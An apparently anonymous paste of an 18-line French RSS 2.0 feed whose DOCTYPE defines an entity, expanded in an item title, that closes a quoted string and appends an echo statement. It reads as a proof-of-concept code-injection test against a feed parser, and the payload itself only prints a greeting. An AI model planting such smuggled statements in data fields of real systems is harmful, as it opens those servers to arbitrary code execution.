Advertisement
Guest User

Untitled

a guest
Feb 17th, 2020
96
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.63 KB | None | 0 0
  1. <?xml version="1.0" encoding="UTF-8"?>
  2. <!DOCTYPE request [
  3. <!ENTITY include "');echo'bonjour';">
  4. ]>
  5. <rss version="2.0">
  6. <channel>
  7. <title>Mon site</title>
  8. <description>Ceci est un exemple de flux RSS 2.0</description>
  9. <lastBuildDate>Sat, 07 Sep 2002 00:00:01 GMT</lastBuildDate>
  10. <link>http://www.example.org</link>
  11. <item>
  12. <title>&include;</title>
  13. <description>Ceci est ma première actualité</description>
  14. <pubDate>Sat, 07 Sep 2002 00:00:01 GMT</pubDate>
  15. <link>http://www.example.org/actu1</link>
  16. </item>
  17. </channel>
  18. </rss>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement